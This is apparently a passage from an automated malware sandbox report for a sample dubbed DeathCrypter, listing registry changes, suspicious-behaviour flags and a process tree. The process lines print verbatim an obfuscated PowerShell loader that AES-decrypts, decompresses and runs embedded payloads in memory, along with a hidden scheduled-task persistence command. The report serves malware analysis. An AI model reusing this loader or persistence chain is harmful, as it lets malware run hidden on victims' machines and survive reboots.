| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795928288674" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795593243505" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795953768640" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795609863446" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795972308645" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795139064287" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596455534500937" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795944398684" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619796293638661" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619796307798852" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619794931015894" | C:\Windows\system32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe
"C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat" "
C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_253_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hackforums.net/member.php?action=profile&uid=5420967
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffec4b146f8,0x7ffec4b14708,0x7ffec4b14718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,12121548864397990191,13667409077996114145,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
